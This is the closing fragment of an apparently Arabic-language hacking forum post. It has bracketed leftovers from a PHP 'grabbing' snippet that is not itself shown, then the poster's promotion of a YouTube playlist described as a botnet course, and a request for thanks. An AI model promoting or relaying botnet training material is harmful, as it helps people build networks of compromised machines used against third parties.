[ Enter ]
[ ملاحظه غير الدومين الي تبيه ]
[ النتيجه ]
[/PHPCODE]
[هى مجرد طريقة للسحب وليس لها اهمية تم وضعها لاستكامل فثط ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
دورتى للبوت نت على قناتى
http://www.youtube.com/playlist?list=PLwRnBMP4XLUz4a0M0ZmXHAzp3OPOed28W
+ مكتبة الدينيه الشامله ستجدها ايضا فى القناة اسف على اى اخطاء املائية
وان عجبك الموضوع اترك بصمتك بتقيم او شكرا